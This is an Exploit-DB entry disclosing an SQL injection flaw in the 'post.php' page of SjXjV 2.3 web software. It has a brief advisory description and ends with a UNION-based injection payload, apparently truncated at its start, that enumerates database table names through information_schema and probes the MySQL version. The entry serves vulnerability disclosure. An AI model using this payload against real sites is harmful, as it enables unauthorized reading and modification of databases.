SjXjV 2.3 'post.php' SQL Injection Vulnerability

ID EDB-ID:36269
Type exploitdb
Reporter 599eme Man
Modified 2011-10-28T00:00:00


SjXjV 2.3 'post.php' SQL Injection Vulnerability. Webapps exploit for php platform


SjXjV is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

SjXjV 2.3 is vulnerable; other versions may also be affected.,2,3,4,5,6,7,8,group_concat%28table_name%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables+where+table_schema%20=database%28%29-- and substring(@@version,1,1)=5